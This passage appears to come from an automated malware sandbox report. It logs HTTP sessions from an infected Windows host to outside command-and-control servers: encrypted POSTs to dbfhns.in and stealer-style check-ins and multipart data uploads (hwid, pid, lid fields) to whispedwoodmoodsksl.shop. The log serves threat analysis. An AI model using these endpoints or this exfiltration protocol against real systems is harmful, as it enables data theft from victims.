                                                                      May 26, 2024 10:31:46.916753054 CEST294OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 74 0d e8 a0
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vutdGa`#S@|tw12zE#&J|g7.2yFsfQ.gb,yT~O;M|A[h9gFT2
                                                                      May 26, 2024 10:31:47.836388111 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:47 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      35192.168.2.44981231.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:52.145184994 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://hnsdtfxaaeohqfta.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 153
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:52.145207882 CEST153OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 41 c3 bc
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vusAd;TrO;7J&z.l*X:n!&.5;F]?
                                                                      May 26, 2024 10:31:52.961499929 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:52 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      36192.168.2.44981331.176.197.47802580C:\Windows\explorer.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      May 26, 2024 10:31:58.304457903 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ioilnxgrkungvgve.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 293
                                                                      Host: dbfhns.in
                                                                      May 26, 2024 10:31:58.304493904 CEST293OUTData Raw: 3b 6e 21 15 f5 bc 1c 2e a9 d8 b7 0a 04 08 7c bf 0a 0f cf e7 19 06 e5 6a 0a 79 0f e5 41 c4 b3 6d 92 2d b5 58 72 19 24 1b e7 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7e 09 a4 8f
                                                                      Data Ascii: ;n!.|jyAm-Xr$? 9Yt M@NA .[k,vu~|-VW|y/~Y1+Br,-j{,/~R*FJtl=B,.:9:CzD9F%P0iPAArOyBu
                                                                      May 26, 2024 10:31:59.111386061 CEST151INHTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Sun, 26 May 2024 08:31:58 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 03 00 00 00 72 e8 84
                                                                      Data Ascii: r


                                                                      HTTPS Proxied Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449744188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:30 UTC271OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2024-05-26 08:28:31 UTC818INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:31 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=gjl9dejvd2l681841hpvvg7go0; expires=Thu, 19-Sep-2024 02:15:10 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FPUVKNBTCxl2I3XcgO%2Bk1KuQbVJ3S4Irm%2FOVEUZi9uX%2BzTQ0%2B4d8cLCDSmPBprqo%2Ft3dfP00KqVNrs%2BCbgws5G8InnwoZ7yrFkLjCpDzYwxWNZT6GGy70soLWoGJ55Q1Fc1qDX8ye7Nfwco%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c6464c8117d26-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:31 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2024-05-26 08:28:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449746188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:32 UTC272OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 74
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:32 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                                      2024-05-26 08:28:33 UTC812INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:33 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=sd6vqu8j0mceb87om22hlmuit2; expires=Thu, 19-Sep-2024 02:15:12 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6n%2Fs4CnMAkW56bHdtCIo5rqJ3kvFF%2FFvIHDs9y2uNreDzwPvyp1C7OT6f4uZbwL2qDLoPei6%2F6VjnLlP3ludP%2Bl5y2u6ev68kv1teLI3U3nofN6dT1NPqnFPOjscqoXmCfYJveE8cxDgLJE%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c646d2885436c-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:33 UTC557INData Raw: 31 64 39 34 0d 0a 49 41 69 68 76 5a 34 61 73 6f 35 36 52 43 39 31 5a 44 74 70 75 68 4b 58 4c 33 53 41 66 4d 30 48 6b 62 64 63 7a 6c 67 6e 48 64 5a 62 4b 74 65 66 70 43 36 65 72 41 6b 68 44 55 38 51 53 52 7a 66 50 72 56 4f 45 4b 4a 47 71 32 62 39 78 44 6e 69 65 6b 4a 6c 39 42 70 54 32 70 2f 37 64 4a 43 30 57 43 46 46 46 77 56 58 43 39 74 35 2b 46 38 59 34 78 53 68 59 50 6e 53 50 36 6f 35 53 33 43 7a 52 57 33 41 31 2f 42 7a 33 2b 59 58 5a 67 4e 58 41 55 46 4c 67 44 44 61 53 67 44 68 4d 61 78 30 2b 70 55 68 34 69 4d 46 65 4c 67 43 4d 6f 50 63 2b 33 6a 65 36 42 34 76 52 78 30 4d 58 77 72 65 65 4f 64 47 45 75 67 55 72 32 50 34 32 44 61 2b 4e 45 46 33 75 45 4e 6e 77 4a 2b 79 4f 4e 66 30 57 48 34 4e 52 44 52 61 47 73 6c 6c 2b 46 30 51 6f 67 48 68 66 4c 50 53 4d
                                                                      Data Ascii: 1d94IAihvZ4aso56RC91ZDtpuhKXL3SAfM0HkbdczlgnHdZbKtefpC6erAkhDU8QSRzfPrVOEKJGq2b9xDniekJl9BpT2p/7dJC0WCFFFwVXC9t5+F8Y4xShYPnSP6o5S3CzRW3A1/Bz3+YXZgNXAUFLgDDaSgDhMax0+pUh4iMFeLgCMoPc+3je6B4vRx0MXwreeOdGEugUr2P42Da+NEF3uENnwJ+yONf0WH4NRDRaGsll+F0QogHhfLPSM
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 46 59 50 70 62 4b 73 54 54 76 43 43 51 34 68 30 70 58 78 59 55 58 41 58 4b 66 50 42 4c 47 2b 45 51 72 32 44 30 32 44 43 71 50 55 5a 33 73 45 4e 6b 7a 39 58 2f 66 4e 4f 73 56 6d 5a 4b 44 30 59 42 53 2b 6c 7a 38 55 6f 45 34 52 44 76 65 72 33 4d 66 71 73 32 42 53 66 30 53 47 7a 4f 31 76 64 2f 32 4f 41 4b 4c 55 49 55 44 31 34 4e 30 6e 50 39 52 78 44 73 48 36 68 67 39 4d 63 77 70 7a 64 47 64 62 49 43 4a 49 50 59 35 44 69 49 72 44 59 6c 58 41 45 30 57 68 72 4a 4d 4f 6f 44 44 36 49 5a 6f 79 57 72 6c 54 65 6b 4e 55 68 79 76 6b 78 76 7a 74 62 39 65 64 33 71 45 79 64 46 48 77 4a 65 43 39 78 39 2b 6b 4d 57 37 42 61 71 59 66 6e 63 66 75 4a 36 51 6d 66 30 47 69 72 7a 30 76 42 30 32 2b 42 59 4f 51 4d 4f 52 6c 34 48 6d 43 69 31 52 42 37 74 45 36 4a 76 2f 64 41 7a 70 54
                                                                      Data Ascii: FYPpbKsTTvCCQ4h0pXxYUXAXKfPBLG+EQr2D02DCqPUZ3sENkz9X/fNOsVmZKD0YBS+lz8UoE4RDver3Mfqs2BSf0SGzO1vd/2OAKLUIUD14N0nP9RxDsH6hg9McwpzdGdbICJIPY5DiIrDYlXAE0WhrJMOoDD6IZoyWrlTekNUhyvkxvztb9ed3qEydFHwJeC9x9+kMW7BaqYfncfuJ6Qmf0Girz0vB02+BYOQMORl4HmCi1RB7tE6Jv/dAzpT
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 41 46 2f 41 30 66 4a 2f 78 71 77 48 61 46 52 58 41 56 56 4c 67 44 44 2b 54 52 72 6c 46 71 6c 68 2b 39 6f 78 70 53 68 45 63 37 70 51 62 63 50 57 38 6e 66 63 35 52 55 68 51 42 77 4d 56 41 2f 66 63 62 55 44 56 75 55 47 37 7a 32 7a 34 79 36 68 4e 6d 74 30 75 45 73 71 33 4a 48 6c 4f 4e 66 67 57 48 34 4e 45 77 70 52 41 64 64 35 2f 30 63 5a 36 78 36 6e 62 50 72 57 50 71 41 38 52 48 4f 34 54 32 2f 41 32 76 46 39 30 4f 41 66 49 55 78 58 53 42 6b 4d 77 44 43 74 44 53 62 76 45 71 52 70 73 65 41 39 6f 6a 52 43 61 66 52 64 4a 4e 71 66 2b 33 53 51 74 46 67 70 54 42 6f 4d 55 67 58 55 63 66 56 4a 46 65 67 65 6f 47 44 31 33 54 65 73 4b 45 4a 77 74 55 4e 68 79 4e 4c 79 66 64 48 70 48 32 59 44 56 77 46 42 53 34 41 77 32 47 51 73 6f 67 48 68 66 4c 50 53 4d 75 78 69 42 58 75
                                                                      Data Ascii: AF/A0fJ/xqwHaFRXAVVLgDD+TRrlFqlh+9oxpShEc7pQbcPW8nfc5RUhQBwMVA/fcbUDVuUG7z2z4y6hNmt0uEsq3JHlONfgWH4NEwpRAdd5/0cZ6x6nbPrWPqA8RHO4T2/A2vF90OAfIUxXSBkMwDCtDSbvEqRpseA9ojRCafRdJNqf+3SQtFgpTBoMUgXUcfVJFegeoGD13TesKEJwtUNhyNLyfdHpH2YDVwFBS4Aw2GQsogHhfLPSMuxiBXu
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 39 54 7a 63 39 57 73 56 6d 5a 4b 44 30 59 42 53 2b 6c 7a 34 31 6f 47 37 6c 36 77 4b 2b 71 56 4f 61 42 36 48 54 2b 31 55 47 44 4a 30 66 6c 33 31 65 38 58 49 55 41 52 43 6c 4d 43 30 48 62 36 52 41 54 68 45 71 46 69 2f 64 6b 77 6f 54 42 47 63 76 51 4d 4b 73 54 48 76 43 43 51 77 42 38 72 59 78 77 4b 58 6b 76 48 50 75 77 4e 45 65 35 65 39 79 58 2f 33 7a 4b 6c 4f 6b 78 36 76 45 6c 6a 78 74 37 33 66 64 50 71 46 53 6c 45 42 51 78 61 42 64 74 38 2b 55 73 58 34 51 79 6e 62 4c 4f 62 66 71 73 69 42 53 66 30 59 32 54 4f 79 2f 74 6f 6b 50 4e 57 50 77 30 51 43 68 6c 54 6d 48 50 30 51 68 58 6a 45 36 6c 73 2b 39 55 34 71 54 56 49 63 62 4e 46 61 73 37 52 38 33 37 59 34 52 51 74 51 78 34 41 57 51 72 53 4d 4c 73 4e 45 66 70 65 39 79 58 44 31 6a 36 73 49 51 56 67 2b 6c 73 71
                                                                      Data Ascii: 9Tzc9WsVmZKD0YBS+lz41oG7l6wK+qVOaB6HT+1UGDJ0fl31e8XIUARClMC0Hb6RAThEqFi/dkwoTBGcvQMKsTHvCCQwB8rYxwKXkvHPuwNEe5e9yX/3zKlOkx6vEljxt73fdPqFSlEBQxaBdt8+UsX4QynbLObfqsiBSf0Y2TOy/tokPNWPw0QChlTmHP0QhXjE6ls+9U4qTVIcbNFas7R837Y4RQtQx4AWQrSMLsNEfpe9yXD1j6sIQVg+lsq
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 33 43 2f 6c 68 6f 44 52 41 65 47 56 4f 59 52 76 4a 64 42 75 46 63 6e 6e 50 77 77 7a 57 68 4e 67 56 67 2b 6c 73 71 78 4e 4f 38 49 4a 44 71 46 79 39 4f 47 41 64 51 42 39 56 31 2f 45 67 58 35 42 71 6c 62 2f 50 54 4f 4b 30 2f 54 33 79 31 53 47 50 45 31 2f 74 37 77 71 78 57 5a 6b 6f 50 52 67 46 4c 38 58 66 6e 51 77 61 69 41 65 46 38 73 39 49 79 37 47 49 46 65 37 35 4e 62 73 54 54 2b 6e 33 57 34 52 6b 70 54 42 63 4a 58 51 44 52 64 76 52 41 45 2b 38 61 76 57 2f 34 32 6a 4b 6c 4e 6b 67 2f 2b 67 4a 74 32 35 2b 6b 4f 4f 48 68 46 69 68 4b 41 55 5a 47 52 63 45 77 38 6b 46 57 75 6c 36 75 61 66 7a 57 4d 61 38 35 52 48 57 6d 55 47 62 4b 31 2f 6c 30 32 2b 49 65 4e 45 73 59 44 31 6f 49 30 58 66 39 51 52 7a 68 47 65 38 72 73 39 49 6d 37 47 49 46 58 4b 4e 53 5a 34 50 41 73
                                                                      Data Ascii: 3C/lhoDRAeGVOYRvJdBuFcnnPwwzWhNgVg+lsqxNO8IJDqFy9OGAdQB9V1/EgX5Bqlb/PTOK0/T3y1SGPE1/t7wqxWZkoPRgFL8XfnQwaiAeF8s9Iy7GIFe75NbsTT+n3W4RkpTBcJXQDRdvRAE+8avW/42jKlNkg/+gJt25+kOOHhFihKAUZGRcEw8kFWul6uafzWMa85RHWmUGbK1/l02+IeNEsYD1oI0Xf9QRzhGe8rs9Im7GIFXKNSZ4PAs
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 52 49 6b 55 55 42 6c 30 50 33 33 58 32 51 52 33 6c 48 61 42 68 2b 74 73 33 6f 33 6f 4c 50 37 4e 61 4b 70 75 66 33 57 50 54 34 42 56 6d 55 6c 6b 66 47 51 7a 55 4d 4b 30 4e 47 75 77 62 72 32 2f 31 30 54 75 71 4d 45 42 2f 76 30 46 6c 78 39 6e 34 64 39 44 6e 45 53 64 4c 45 67 78 53 44 64 56 7a 38 30 74 57 72 46 36 6f 66 62 4f 4e 66 6f 77 68 53 48 4f 7a 41 6e 57 4e 78 72 78 2f 33 4b 78 41 5a 6b 59 62 41 6c 34 4c 31 58 50 39 53 42 4c 6f 47 36 39 74 34 64 30 2b 71 79 68 58 66 37 31 48 5a 73 44 66 2b 48 37 5a 36 68 73 69 44 56 6c 47 58 68 4f 59 4b 4c 56 67 47 75 55 33 71 48 36 7a 79 6e 43 31 65 6b 4a 7a 39 42 6f 71 77 74 54 32 64 39 33 76 48 69 56 47 45 67 78 59 44 4e 42 39 35 30 34 5a 37 52 71 76 61 76 58 54 50 36 4d 38 51 6e 61 31 53 6d 32 44 6b 62 78 2f 79 4b
                                                                      Data Ascii: RIkUUBl0P33X2QR3lHaBh+ts3o3oLP7NaKpuf3WPT4BVmUlkfGQzUMK0NGuwbr2/10TuqMEB/v0Flx9n4d9DnESdLEgxSDdVz80tWrF6ofbONfowhSHOzAnWNxrx/3KxAZkYbAl4L1XP9SBLoG69t4d0+qyhXf71HZsDf+H7Z6hsiDVlGXhOYKLVgGuU3qH6zynC1ekJz9BoqwtT2d93vHiVGEgxYDNB9504Z7RqvavXTP6M8Qna1Sm2Dkbx/yK
                                                                      2024-05-26 08:28:33 UTC178INData Raw: 56 31 34 4a 52 5a 68 30 35 41 31 4f 73 6b 7a 30 4d 4b 43 43 62 76 34 6c 43 32 62 30 56 43 71 62 6a 62 49 34 77 71 78 41 5a 67 6f 55 46 45 73 4e 32 32 62 32 43 69 6a 63 4d 4b 68 6a 39 74 49 75 37 68 52 4f 61 37 4d 43 4a 49 50 51 76 43 44 70 72 46 42 6d 63 6c 6c 47 51 55 75 41 4d 4d 42 4f 47 4f 77 5a 75 58 53 2b 2b 7a 6d 71 50 30 4a 76 39 6d 78 68 31 39 69 38 4e 70 44 71 57 48 34 64 57 55 5a 64 47 70 67 6f 70 52 39 4e 74 30 33 34 4e 61 48 4b 63 4c 56 36 55 7a 2f 73 45 43 53 44 7a 62 77 67 6b 4b 73 62 4e 46 38 52 42 55 38 49 0d 0a
                                                                      Data Ascii: V14JRZh05A1Oskz0MKCCbv4lC2b0VCqbjbI4wqxAZgoUFEsN22b2CijcMKhj9tIu7hROa7MCJIPQvCDprFBmcllGQUuAMMBOGOwZuXS++zmqP0Jv9mxh19i8NpDqWH4dWUZdGpgopR9Nt034NaHKcLV6Uz/sECSDzbwgkKsbNF8RBU8I
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 31 34 30 34 0d 0a 6e 30 37 4c 54 67 44 76 45 61 52 6b 7a 65 73 51 6f 54 74 47 63 66 5a 7a 66 4d 37 50 2f 33 33 58 30 69 59 6f 53 67 4d 42 56 77 33 59 4d 4c 73 4e 47 61 4a 47 6c 69 57 37 6c 51 48 69 65 6c 30 2f 37 41 4a 66 77 4e 48 79 66 38 62 39 56 51 56 62 47 67 6c 53 43 70 67 2b 74 55 74 57 75 6b 37 68 4a 66 66 45 66 76 52 71 46 79 54 68 45 54 32 54 6a 65 4d 32 79 61 77 4f 5a 68 56 46 53 42 6b 5a 6d 43 69 31 43 68 6a 76 48 36 78 72 38 4d 63 73 71 6a 6c 54 66 50 4e 38 56 4f 4c 53 39 33 54 64 34 78 4d 59 63 7a 59 4c 55 67 66 56 66 2f 35 7a 4b 50 63 64 6f 57 76 30 77 79 2f 73 64 41 56 77 39 42 70 54 67 35 65 38 52 35 36 73 41 47 59 56 56 7a 4e 61 42 64 5a 33 34 31 78 62 77 78 4f 6b 61 66 37 61 4e 65 78 30 42 58 6e 30 47 6a 71 4e 6e 2f 68 70 6b 4c 52 49 64
                                                                      Data Ascii: 1404n07LTgDvEaRkzesQoTtGcfZzfM7P/33X0iYoSgMBVw3YMLsNGaJGliW7lQHiel0/7AJfwNHyf8b9VQVbGglSCpg+tUtWuk7hJffEfvRqFyThET2TjeM2yawOZhVFSBkZmCi1ChjvH6xr8McsqjlTfPN8VOLS93Td4xMYczYLUgfVf/5zKPcdoWv0wy/sdAVw9BpTg5e8R56sAGYVVzNaBdZ341xbwxOkaf7aNex0BXn0GjqNn/hpkLRId
                                                                      2024-05-26 08:28:33 UTC1369INData Raw: 56 43 4e 31 33 35 51 45 4d 37 52 44 76 57 72 32 56 4a 75 78 69 42 56 79 6d 55 47 54 49 33 76 39 75 32 2b 45 55 4e 77 41 7a 44 56 63 4d 34 48 76 37 51 78 57 69 55 4f 39 6a 73 34 31 75 34 6e 70 42 62 76 51 61 4f 70 47 45 71 53 75 48 76 45 6f 35 41 77 35 47 54 30 75 41 49 72 73 4e 42 4b 4a 47 37 79 4c 6b 78 44 6d 38 4b 46 56 79 73 45 6c 6b 78 4a 69 38 4e 70 44 6a 57 48 35 30 56 30 34 56 41 74 68 32 37 77 30 70 72 46 36 33 4a 61 75 56 48 62 34 6f 53 33 53 31 51 58 7a 49 30 76 42 70 6e 63 55 66 49 58 38 55 46 30 68 4c 6c 6a 44 7a 44 55 36 79 55 4f 39 68 34 70 56 6d 2f 47 67 65 4b 75 63 56 4f 70 48 41 73 6d 47 51 2b 6c 68 2b 48 31 6c 47 53 30 75 41 4d 4c 4a 4f 42 50 41 59 72 48 50 77 6b 67 43 53 44 45 4a 78 73 30 64 36 77 4e 43 2b 58 74 66 39 45 54 42 41 42 55
                                                                      Data Ascii: VCN135QEM7RDvWr2VJuxiBVymUGTI3v9u2+EUNwAzDVcM4Hv7QxWiUO9js41u4npBbvQaOpGEqSuHvEo5Aw5GT0uAIrsNBKJG7yLkxDm8KFVysElkxJi8NpDjWH50V04VAth27w0prF63JauVHb4oS3S1QXzI0vBpncUfIX8UF0hLljDzDU6yUO9h4pVm/GgeKucVOpHAsmGQ+lh+H1lGS0uAMLJOBPAYrHPwkgCSDEJxs0d6wNC+Xtf9ETBABU


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.449749188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:34 UTC290OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 18158
                                                                      Host: whispedwoodmoodsksl.shop
                                                                      2024-05-26 08:28:34 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 45 36 39 30 46 37 41 45 45 45 38 34 41 36 38 38 39 44 35 41 44 31 30 45 42 39 44 43 36 38 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 73 77 67 35 45 47 2d 2d 0d 0a 2d 2d 62
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"02E690F7AEEE84A6889D5AD10EB9DC68--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"swg5EG----b
                                                                      2024-05-26 08:28:34 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                      Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                      2024-05-26 08:28:35 UTC808INHTTP/1.1 200 OK
                                                                      Date: Sun, 26 May 2024 08:28:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=heirdk4fhv89ggdfhhuhkq23rj; expires=Thu, 19-Sep-2024 02:15:13 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YaQUykdkH297l1Db%2F6NTcwgjSnr6GCWgneAwYtFVdv4uGDpQit1sci8z6Vl%2Fxv3G9F4hTG1oBs0oBJElsby0pR6tRwRQybNSe3R9v6INtOUhpsK8UUwOtSSIWNupJkTNito0V79y0cexwKw%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 889c647969a80cb5-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-05-26 08:28:35 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a
                                                                      Data Ascii: fok 8.46.123.175
                                                                      2024-05-26 08:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.449751188.114.96.34437932C:\Users\user\AppData\Local\Temp\38F9.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:28:36 UTC289OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8779
                                                                      Host: whispedwoodmoodsksl.shop
